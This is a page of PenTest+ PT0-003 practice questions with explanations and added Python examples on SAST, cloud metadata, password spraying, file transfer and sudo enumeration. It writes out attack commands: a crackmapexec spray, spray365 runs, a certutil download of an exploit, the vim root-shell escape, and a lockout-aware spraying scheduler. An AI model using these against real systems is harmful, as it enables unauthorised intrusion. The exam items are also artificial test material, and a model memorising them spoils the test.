Practice Free PT0-003 Exam Online Questions
After exploiting a vulnerability in an insecure service to gain access to a Linux system, a penetration tester executes the following commands:
sudo -l
route
netstat -a
last
who
Which of the following best describes the tester’s purpose for running these commands?
- A . To obtain information about other systems in the network
- B . To enumerate users and services in order to identify additional targets
- C . To prepare for establishing persistence on the system
- D . To gather data to prepare for lateral movement
D
Explanation:
The correct answer is D. To gather data to prepare for lateral movement
These commands are commonly used during post-exploitation enumeration to understand the compromised host, network connectivity, active users, login history, and possible privilege escalation paths. This information helps the tester determine where and how to move next inside the environment.
sudo -l checks what commands the current user can run with elevated privileges.
route displays the system routing table and can reveal reachable internal networks.
netstat -a shows active connections and listening services, which may identify connected hosts or services useful for pivoting.
last shows previous login activity and can reveal user accounts, source systems, and administrative access patterns.
who shows currently logged-in users.
A is incorrect because only route and netstat reveal other systems; sudo -l, last and who describe this host's privileges and sessions, so the set as a whole supports post-exploitation planning rather than just mapping other systems.
B is incorrect because the commands do not primarily enumerate all users and services. They collect privilege, network, session, and login information.
C is incorrect because persistence would involve creating or modifying access mechanisms, such as users, SSH keys, startup scripts, cron jobs, or services. These commands are reconnaissance and enumeration commands, not persistence actions.
In PenTest+ (PT0-003) terms, this falls under Post-exploitation and Lateral Movement, specifically post-exploitation enumeration and lateral movement preparation.
A penetration tester reviews a scan report and identifies a deserialization vulnerability. The vulnerability is due to the way a function from a Python library has been used in code. The scan does not consider input data being used in the function’s serialization.
Which of the following scan types most likely provided this finding?
- A . DAST
- B . SAST
- C . IAST
- D . SCA
B
Explanation:
SAST is the most likely scan type because it analyzes source code, syntax, and coding patterns without executing the application. The question states that the finding is based on how a function from a Python library has been used in code, which is exactly the type of issue SAST tools are designed to detect. A deserialization weakness often appears when unsafe functions or insecure object handling are identified statically in the codebase. The statement that the scan does not consider actual input data further supports SAST, since static analysis usually flags risky usage patterns without observing live runtime behavior or real request flows. DAST focuses on behavior during execution from the outside, IAST observes the application during runtime, and SCA mainly identifies vulnerable third-party components rather than unsafe implementation logic in custom code.
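As an added example (not part of the original question bank or of any scanner's code), the following toy rule shows what a SAST check for this finding does: it walks the Python AST and flags pickle, marshal and yaml.load calls that turn untrusted bytes into live objects, without executing the code or looking at any input data. The two sample handlers, their module names and the short list of risky calls are constructed for the demonstration.

```python
"""Toy SAST rule for unsafe deserialization in Python source (added example)."""
import ast

# (module, function) pairs that turn untrusted bytes into live objects.
UNSAFE_CALLS = {
    ("pickle", "load"), ("pickle", "loads"),
    ("marshal", "load"), ("marshal", "loads"),
    ("yaml", "load"),   # unsafe unless a safe Loader is passed explicitly
}
SAFE_YAML_LOADERS = {"SafeLoader", "CSafeLoader"}


def _call_target(func):
    """Return (module, attr) for a call written as module.attr(...), else None."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return func.value.id, func.attr
    return None


def _yaml_load_is_safe(call):
    """yaml.load(text, Loader=yaml.SafeLoader) is fine; FullLoader, UnsafeLoader or no Loader is not."""
    for kw in call.keywords:
        if kw.arg == "Loader":
            value = kw.value
            name = value.attr if isinstance(value, ast.Attribute) else getattr(value, "id", "")
            return name in SAFE_YAML_LOADERS
    return False


def find_unsafe_deserialization(source):
    """Return sorted [(line_number, 'module.function'), ...] for risky calls, purely from the AST."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        target = _call_target(node.func)
        if target not in UNSAFE_CALLS:
            continue
        if target == ("yaml", "load") and _yaml_load_is_safe(node):
            continue
        findings.append((node.lineno, ".".join(target)))
    return sorted(findings)


# Constructed sample code: a vulnerable module beside its hardened rewrite.
VULNERABLE = '''
import pickle, yaml
def load_session(blob):
    return pickle.loads(blob)          # attacker-supplied opcodes run during unpickling
def load_config(text):
    return yaml.load(text)             # default/Full loader can construct arbitrary objects
'''

HARDENED = '''
import json, yaml
def load_session(blob):
    return json.loads(blob)            # data-only format, no object construction
def load_config(text):
    return yaml.load(text, Loader=yaml.SafeLoader)
'''

if __name__ == "__main__":
    print(find_unsafe_deserialization(VULNERABLE))   # [(4, 'pickle.loads'), (6, 'yaml.load')]
    print(find_unsafe_deserialization(HARDENED))     # []
```

The rule is deliberately blind to where the argument comes from: like the scanner in the question, it reports the usage pattern, and a reviewer then decides whether the data can be attacker-controlled. A DAST or IAST tool would instead need a request that actually reaches load_session with a crafted blob.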
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization.
Through which of the following features could this information have been accessed?
- A . IAM
- B . Block storage
- C . Virtual private cloud
- D . Metadata services
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured, either from a shell on the instance or indirectly through an SSRF flaw in an application running on it.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization (user data, bootstrap scripts and any secrets embedded in them), which can lead to further exploitation. Providers mitigate this with session-token or required-header variants of the service (for example, the PUT-issued token of AWS IMDSv2), but the durable fix is to keep secrets out of user data altogether.
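Added example, not any cloud provider's code: a localhost mock of an instance-metadata endpoint and a client that reads user-data from it, first with a plain GET (the v1-style behaviour that leaks to anything able to issue a request from the instance) and then with the PUT-then-GET token exchange. The paths and header names follow the AWS conventions (/latest/user-data, X-aws-ec2-metadata-token), but the server, token value and user-data contents are constructed for the demo; other providers require different headers (Metadata-Flavor: Google, or Metadata: true on Azure).

```python
"""Mock instance-metadata endpoint and client (added example, not provider code)."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed user-data of the kind an operator should never pass at boot.
USER_DATA = b"#!/bin/bash\nexport DB_PASSWORD='S3cret!'\n/opt/app/bootstrap.sh\n"
TOKEN = "mock-session-token"                       # what the mock's PUT hands out
TOKEN_HDR = "X-aws-ec2-metadata-token"
TTL_HDR = "X-aws-ec2-metadata-token-ttl-seconds"
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore env proxies


class MetadataHandler(BaseHTTPRequestHandler):
    require_token = False   # False mimics v1 (any GET works); True mimics v2 (token required)

    def log_message(self, *args):
        pass                # keep the demo quiet

    def _reply(self, code, body):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_PUT(self):
        # v2-style token issuance: needs a PUT with a TTL header, which a GET-only SSRF cannot send
        if self.path == "/latest/api/token" and TTL_HDR in self.headers:
            return self._reply(200, TOKEN.encode())
        self._reply(400, b"bad request")

    def do_GET(self):
        if self.path != "/latest/user-data":
            return self._reply(404, b"not found")
        if self.require_token and self.headers.get(TOKEN_HDR) != TOKEN:
            return self._reply(401, b"token required")
        self._reply(200, USER_DATA)


def start_mock(require_token):
    """Start the mock on an ephemeral localhost port; returns (server, base_url)."""
    handler = type("Handler", (MetadataHandler,), {"require_token": require_token})
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def fetch_user_data(base_url, with_token):
    """Read user-data; returns (status, body). with_token=True does the PUT token exchange first."""
    headers = {}
    if with_token:
        req = urllib.request.Request(base_url + "/latest/api/token", method="PUT", headers={TTL_HDR: "60"})
        with OPENER.open(req) as resp:
            headers[TOKEN_HDR] = resp.read().decode()
    req = urllib.request.Request(base_url + "/latest/user-data", headers=headers)
    try:
        with OPENER.open(req) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def demo():
    """Status codes seen by a plain GET and by a token-bearing client against both modes."""
    results = {}
    for mode in ("v1-style", "v2-style"):
        srv, url = start_mock(require_token=(mode == "v2-style"))
        try:
            results[mode] = {"plain_get": fetch_user_data(url, with_token=False)[0],
                             "with_token": fetch_user_data(url, with_token=True)[0]}
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    print(demo())   # {'v1-style': {'plain_get': 200, 'with_token': 200}, 'v2-style': {'plain_get': 401, 'with_token': 200}}
```

Even the token mode still serves the secret to anyone with code execution on the instance, which is the scenario in the question; the token only removes the easy SSRF path.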
A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access.
Which of the following techniques should the tester use?
- A . Credential stuffing
- B . MFA fatigue
- C . Dictionary attack
- D . Brute-force attack
A
Explanation:
To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.
Credential Stuffing:
Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.
Advantages: Unlike brute-force and dictionary attacks, which make many guesses against each account, credential stuffing replays pairs already known to be valid somewhere, typically one attempt per account, so it stays well below any lockout threshold.
Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.
Other Techniques:
MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.
Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.
Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to high number of failed attempts.
Pentest Reference: Password Attacks: Understanding different types of password attacks and their implications on account security.
Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.
By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.
While performing an internal assessment, a tester uses the following command:
crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@
Which of the following is the main purpose of the command?
- A . To perform a pass-the-hash attack over multiple endpoints within the internal network
- B . To perform common protocol scanning within the internal network
- C . To perform password spraying on internal systems
- D . To execute a command in multiple endpoints at the same time
C
Explanation:
The command crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ performs password spraying: one password (Summer123@) is tried against every user in user.txt on every SMB host in the /24. A single guess per account keeps each account well under a typical lockout threshold, which is the point of spraying. CrackMapExec (CME) is a post-exploitation tool that helps automate the assessment of large Active Directory networks. It supports multiple protocols, including SMB, and can perform password spraying, credential validation, command execution, and more.
CrackMapExec:
CrackMapExec: A versatile tool designed for pentesters to facilitate the assessment of large Active Directory networks. It supports various protocols such as SMB, WinRM, and LDAP.
Purpose: Commonly used for tasks like password spraying, credential validation, and command execution.
Command Breakdown:
crackmapexec smb: Specifies the protocol to use, in this case SMB (Server Message Block), which is commonly used for file sharing and communication between nodes in a network.
192.168.1.0/24: The target range; every host in the subnet that answers on SMB is tested.
-u user.txt: A file of usernames, one per line, rather than a single user.
-p Summer123@: A single cleartext password. Many users with one password is the spraying pattern; a pass-the-hash attempt would pass an NTLM hash with -H instead.
A is incorrect because no hash is supplied, B is incorrect because credentials are being tested rather than protocols scanned, and D is incorrect because no command to execute (-x or -X) is given.
Two caveats before running this against a real subnet: CME stops trying further users once a password succeeds unless --continue-on-success is set, and for domain accounts the bad-password count is kept by the domain controllers, so one password tried against every host in the /24 costs each domain user one failed attempt per host. Against a large subnet that alone can exceed the lockout threshold; domain accounts are usually sprayed against a single DC or a few hosts, while local accounts keep a separate counter on each host.
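Added example for both the credential-stuffing question above and this one (not code from CrackMapExec or the exam): a small planner that turns a lockout policy into a safe spraying schedule and shows why stuffing never approaches the threshold. The policy values, user names, passwords and leaked pairs are constructed, and the lockout model is the common one (N failures inside a reset period locks the account; for domain accounts every host tried counts against the same counter).

```python
"""Lockout-aware password attack planning (added example, constructed data)."""


def rounds_per_reset_period(hosts, lockout_threshold, domain_accounts=True, safety_margin=1):
    """How many one-password rounds fit in one reset period without locking anyone out.
    A round tries one password against every user on every host. For domain accounts the
    DCs count one failure per host per round; local accounts have a per-host counter."""
    cost_per_round = len(hosts) if domain_accounts else 1
    budget = lockout_threshold - safety_margin          # keep at least one failure in hand
    return budget // cost_per_round


def spray_schedule(passwords, hosts, lockout_threshold, reset_minutes,
                   domain_accounts=True, safety_margin=1):
    """Return [(start_minute, password), ...]: rounds are batched so that no account
    accumulates more than (lockout_threshold - safety_margin) failures per reset period.
    reset_minutes should be the policy's counter-reset period plus a margin."""
    per_period = rounds_per_reset_period(hosts, lockout_threshold, domain_accounts, safety_margin)
    if per_period < 1:
        raise ValueError("a single round would already exceed the safe failure budget")
    return [((i // per_period) * reset_minutes, pw) for i, pw in enumerate(passwords)]


def worst_case_failures(schedule, hosts, reset_minutes, domain_accounts=True):
    """Max failures one account could see inside any reset period if every guess fails."""
    cost_per_round = len(hosts) if domain_accounts else 1
    starts = [t for t, _ in schedule]
    return max(sum(1 for t in starts if t0 <= t < t0 + reset_minutes) for t0 in starts) * cost_per_round


def stuffing_attempts(leaked_pairs, target_users):
    """Credential stuffing: replay only breached pairs whose user exists on the target.
    One attempt per account, so no lockout threshold is approached."""
    known = set(target_users)
    return [(u, p) for u, p in leaked_pairs if u in known]


def attempts_per_account(attempts):
    counts = {}
    for user, _ in attempts:
        counts[user] = counts.get(user, 0) + 1
    return counts


# Constructed sample data, not from any engagement.
TARGET_USERS = ["alice", "bob", "carol"]
SPRAY_PASSWORDS = ["Summer123@", "Winter2024!", "Welcome1", "Password1"]
LEAKED_PAIRS = [("alice", "hunter2"), ("dave", "letmein"), ("bob", "bob1234")]

if __name__ == "__main__":
    one_dc = ["192.168.1.10"]
    sched = spray_schedule(SPRAY_PASSWORDS, one_dc, lockout_threshold=3, reset_minutes=30)
    print(sched)                                      # two passwords now, two more 30 minutes later
    print(worst_case_failures(sched, one_dc, 30))     # 2, below the threshold of 3
    subnet = ["192.168.1.%d" % i for i in range(1, 255)]
    print(rounds_per_reset_period(subnet, 3))         # 0: one password across a /24 would lock domain users
    print(stuffing_attempts(LEAKED_PAIRS, TARGET_USERS))
```

The last print is the CME caveat in numbers: with domain accounts, the /24 in the question turns one password into 254 failed attempts per user, so the safe schedule for that command has zero rounds.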
While conducting a reconnaissance activity, a penetration tester extracts the following information:
Emails:
[email protected]
[email protected]
[email protected]
Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?
- A . Unauthorized access to the network
- B . Exposure of sensitive servers to the internet
- C . Likelihood of SQL injection attacks
- D . Indication of a data breach in the company
A
Explanation:
Discovering valid corporate email addresses during reconnaissance is a classic OSINT outcome that directly enables social engineering attacks, especially phishing and related credential-harvesting techniques. In the PenTest+ methodology, information gathered in reconnaissance is leveraged to obtain an initial foothold, often by targeting users with realistic, role-based lures (for example, “support” tickets, “sales” leads, or “admin” notifications). The primary risk created by exposed or easily discoverable email identities is that an attacker can use them to deliver malicious links, weaponized attachments, or impersonation-based requests that may result in credential compromise or malware execution, leading to unauthorized access to internal systems and the network.
The other options do not logically follow from the provided evidence: email enumeration alone does not demonstrate that sensitive servers are internet-exposed, does not indicate SQL injection likelihood (which is tied to web input validation and testing), and does not prove a data breach; it shows only that the addresses exist or can be collected publicly. Therefore, the most appropriate risk to leverage next is unauthorized network access via phishing/social engineering.
A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network.
Which of the following is the best way to accomplish this task?
- A . nc -lvp 8080
- B . nc -lnvp 443
- C . python3 -m http.server 80
- D . ncat -lvp 9090
C
Explanation:
The correct answer is C. python3 -m http.server 80
Using Python’s built-in HTTP server is one of the fastest and simplest ways to transfer files from a Linux host to another system on the same network.
By running:
python3 -m http.server 80
from the directory containing the exploit, the tester can host the file over HTTP. The Windows 10 system can then retrieve it using a browser, PowerShell (Invoke-WebRequest), certutil -urlcache -f, or another HTTP-capable download method. Binding port 80 requires root (or CAP_NET_BIND_SERVICE) on the Linux side; any port the Windows host can reach works, so a high port such as the module's default 8000 is a common substitute. Comparing a hash of the file on both ends (sha256sum on Linux, Get-FileHash or certutil -hashfile on Windows) confirms the copy is complete and unmodified before it is run.
A, B, and D are incorrect because Netcat/Ncat listeners can be used for file transfer in some cases, but they require more coordination and commands on both systems. They are better suited for raw TCP connections, shells, or manual transfers, not the quickest general-purpose file-serving method.
In PenTest+ (PT0-003) terms, this falls under Post-exploitation and Lateral Movement, specifically using common command-line tools for file transfer during post-exploitation or controlled assessment activities.
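Added example, not part of the original page: the same serve-and-fetch exchange in one runnable script, with the integrity check a tester should do before executing a transferred file. The server side is the http.server module the answer relies on (rooted in a temporary staging directory on an ephemeral port instead of 80); the client side stands in for the Windows download and hashes the result. The payload bytes and file name are constructed.

```python
"""Serve a file with http.server and verify the fetched copy by hash (added example)."""
import functools
import hashlib
import os
import tempfile
import threading
import urllib.request
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-in for the exploit binary; any bytes will do for the demo.
PAYLOAD = b"MZ\x90\x00 constructed stand-in for an exploit binary\n"
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore env proxies


class QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, *args):
        pass            # silence the per-request log lines for the demo


def serve_directory(path):
    """Equivalent of running `python3 -m http.server 0` inside path; returns (server, port)."""
    handler = functools.partial(QuietHandler, directory=path)
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def fetch_and_verify(url, expected_sha256):
    """Download url and compare against the hash computed on the serving side."""
    with OPENER.open(url) as resp:
        data = resp.read()
    return sha256_hex(data) == expected_sha256, data


def demo():
    """Returns (hash matched, tampered hash rejected, full length received)."""
    with tempfile.TemporaryDirectory() as staging:
        with open(os.path.join(staging, "exploit.exe"), "wb") as fh:
            fh.write(PAYLOAD)
        srv, port = serve_directory(staging)
        url = "http://127.0.0.1:%d/exploit.exe" % port
        try:
            ok, data = fetch_and_verify(url, sha256_hex(PAYLOAD))
            tampered, _ = fetch_and_verify(url, "0" * 64)   # wrong expected hash must fail
        finally:
            srv.shutdown()
            srv.server_close()
    return ok, tampered, len(data) == len(PAYLOAD)


if __name__ == "__main__":
    print(demo())   # (True, False, True)
```

On the real Windows target the fetch is a one-liner such as certutil -urlcache -split -f http://<linux-ip>:<port>/exploit.exe exploit.exe, and Get-FileHash exploit.exe gives the value to compare with sha256sum on the Linux side.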
A penetration tester receives the following output when enumerating a local user:
User compromised_user may run the following commands on localhost:
root (NO PASSWD): /bin/vim
The tester suspects that another host on the same subnet is also vulnerable.
Which of the following is the best method to validate whether the other host is vulnerable?
- A . ssh compromised_user@victimhost "vim; echo $?"
- B . ssh compromised_user@victimhost "sudo -l"
- C . ssh compromised_user@victimhost "bash -c vim"
- D . ssh compromised_user@victimhost "ls -lah /bin/vim"
B
Explanation:
The correct answer is B. ssh compromised_user@victimhost "sudo -l"
The output shown in the question is produced by the sudo -l command, which lists the commands a user is allowed to run with elevated privileges.
The key finding is:
root (NO PASSWD): /bin/vim
This means compromised_user can run /bin/vim as root without entering a password. That is a local privilege escalation risk because vim can spawn a shell from inside the editor (for example :!/bin/sh), and a shell spawned from a root-owned vim is a root shell.
To validate whether another host has the same weakness, the tester should enumerate that user’s sudo privileges on the other host:
ssh compromised_user@victimhost "sudo -l"
A is incorrect because running vim only confirms that the program can execute, not that it can be run as root through sudo. The command is also flawed on its own terms: inside double quotes, $? is expanded by the tester's local shell before ssh sends the command, so the exit status printed would not even be the remote one.
C is incorrect because running bash -c vim only starts vim through Bash and does not validate sudo permissions.
D is incorrect because listing /bin/vim only confirms the file exists and shows file permissions. The vulnerability is the sudo misconfiguration, not the presence of the vim binary.
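Added example serving both the post-exploitation enumeration question earlier on this page (where sudo -l is the first command run) and this one; it is not code from the exam or any tool. It parses real sudo -l output, flags NOPASSWD rules whose target runs as root and allows a shell escape, and applies the check to several hosts through a pluggable runner. Real sudo prints the rule as (root) NOPASSWD: /bin/vim rather than the rendering shown in the question, and the parser follows the real format. The per-host outputs below are constructed; ssh_sudo_l shows what the runner looks like over ssh; the shell-escape list is a short subset of well-known binaries, not an exhaustive one.

```python
"""Parse sudo -l output and validate NOPASSWD shell-escape rules across hosts (added example)."""
import re
import subprocess

# Binaries that can spawn a shell or execute commands once running as root (subset only).
SHELL_ESCAPE_BINARIES = {"vim", "vi", "less", "more", "find", "awk", "nano", "man", "perl", "python3"}

# Matches a sudoers rule line as printed by sudo -l, e.g. "    (root) NOPASSWD: /bin/vim"
# or "    (ALL : ALL) ALL". Tags such as NOPASSWD: or SETENV: may precede the command list.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return [(runas_user, nopasswd, command), ...]; non-rule lines are ignored."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()        # "(root)" or "(ALL : ALL)" -> user part
        nopasswd = "NOPASSWD:" in m.group("tags")
        rules.extend((runas, nopasswd, cmd.strip()) for cmd in m.group("cmds").split(","))
    return rules


def root_shell_escapes(rules):
    """Commands runnable as root without a password whose binary gives a shell (or ALL)."""
    hits = []
    for runas, nopasswd, cmd in rules:
        if runas not in ("root", "ALL") or not nopasswd:
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
            hits.append(cmd)
    return hits


def validate_hosts(hosts, run_sudo_l):
    """run_sudo_l(host) returns that host's sudo -l text; result maps host -> exploitable commands."""
    return {host: root_shell_escapes(parse_sudo_l(run_sudo_l(host))) for host in hosts}


def ssh_sudo_l(host, user="compromised_user"):
    """Real runner: sudo -n refuses to prompt, so a host that would ask for a password fails fast."""
    return subprocess.run(["ssh", "%s@%s" % (user, host), "sudo -n -l"],
                          capture_output=True, text=True).stdout


# Constructed sudo -l outputs standing in for ssh compromised_user@<host> "sudo -l".
SAMPLE_OUTPUT = {
    "victimhost": "Matching Defaults entries for compromised_user on victimhost:\n    env_reset\n\n"
                  "User compromised_user may run the following commands on victimhost:\n"
                  "    (root) NOPASSWD: /bin/vim\n",
    "otherhost": "User compromised_user may run the following commands on otherhost:\n"
                 "    (root) /usr/bin/systemctl restart app, /usr/bin/journalctl\n",
    "adminhost": "User compromised_user may run the following commands on adminhost:\n"
                 "    (ALL : ALL) NOPASSWD: ALL\n",
}

if __name__ == "__main__":
    # Swap SAMPLE_OUTPUT.__getitem__ for ssh_sudo_l to run against live hosts.
    print(validate_hosts(list(SAMPLE_OUTPUT), SAMPLE_OUTPUT.__getitem__))
    # {'victimhost': ['/bin/vim'], 'otherhost': [], 'adminhost': ['ALL']}
```

otherhost shows why the check looks at the tag and not just the binary: systemctl as root is still interesting, but it asks for a password, so it is a different finding from the one in the question.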
A penetration tester is preparing a password-spraying attack against a known list of users for the company "example".
The tester is using the following list of commands:
pw-inspector -i sailwords -t 8 -S pass
spray365.py spray -ep plan
users="~/user.txt"; allwords="~/words.txt"; pass="~/passwords.txt"; plan="~/spray.plan"
spray365.py generate --password-file $pass --userfile $user --domain "example.com" --execution-plan $plan
cew -m 5 "http://www.example.com" -w sailwords
Which of the following is the correct order for the list of the commands?
- A . 3,4,1,2,5
- B . 3,1,2,5,4
- C . 2,3,1,4,5
- D . 3,5,1,4,2
D
Explanation:
Each command consumes a file that an earlier command produces, so the order follows the data flow:
Step 3: Sets the shell variables (paths to the user list, word list, password list and execution plan) that later commands reference.
Step 5: cew, as written on the page, is CeWL (the Custom Word List generator): it spiders http://www.example.com, keeps words of at least five characters (-m 5) and writes them to sailwords. This must run before anything reads sailwords.
Step 1: pw-inspector reads sailwords, keeps only the candidates that satisfy the length policy, and writes the result to pass.
Step 4: spray365.py generate builds the execution plan from the filtered password file, the user file and the domain.
Step 2: spray365.py spray -ep plan executes the generated plan.
The dependency chain is therefore 3, 5, 1, 4, 2, which is option D. Option A (3,4,1,2,5) cannot work: it generates the plan before the filtered password file exists, runs the spray before the plan has been generated, and builds the word list last, after everything that needed it.
Two details worth checking before running the list as written: step 3 defines users but step 4 expands $user, so the user-file argument would be empty unless the variable names are made consistent, and the tilde inside the double-quoted paths in step 3 is not expanded by the shell. pw-inspector's options should also be verified against the installed version's help output.
CompTIA PenTest+ Reference: PT0-003, Attacks and Exploits (password attacks).
Kali tools & scripts usage and scripting logic are core elements in PenTest+ methodology.
